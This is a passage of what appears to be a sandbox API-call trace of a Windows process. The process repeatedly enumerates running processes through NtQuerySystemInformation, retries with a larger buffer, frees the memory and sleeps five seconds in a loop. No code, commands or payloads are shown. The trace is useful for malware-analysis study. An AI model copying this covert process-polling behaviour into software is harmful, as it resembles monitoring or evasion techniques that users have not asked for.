returned 0x0 [0231.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.127] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.141] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.148] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.164] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.173] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.194] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.208] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.216] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.231] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.239] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.247] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.254] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.262] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.269] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.277] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.285] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.293] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.297] NtQuerySystemInformation (in: 